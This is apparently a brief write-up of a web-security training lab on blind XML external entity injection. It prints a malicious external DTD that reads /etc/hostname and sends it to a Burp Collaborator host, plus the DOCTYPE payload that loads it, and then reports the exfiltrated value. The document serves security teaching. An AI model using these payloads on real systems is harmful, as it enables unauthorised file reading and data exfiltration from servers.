We first hosted the malicious external DTD from the “Exploit server” of the lab and inserted the Burp Collaborator link:
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://BURP-COLLABORATOR-SUBDOMAIN/?x=%file;'>">
%eval;
%exfil;
We then used the below payload with the function and sent the request:
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>
We got the response as “XML Parsing Error”.
While checking the Collaborator, it was noted that the HTTP request contained the value of the hostname of the machine as the ‘x’ parameter’s value:
We submitted the username and solved the lab.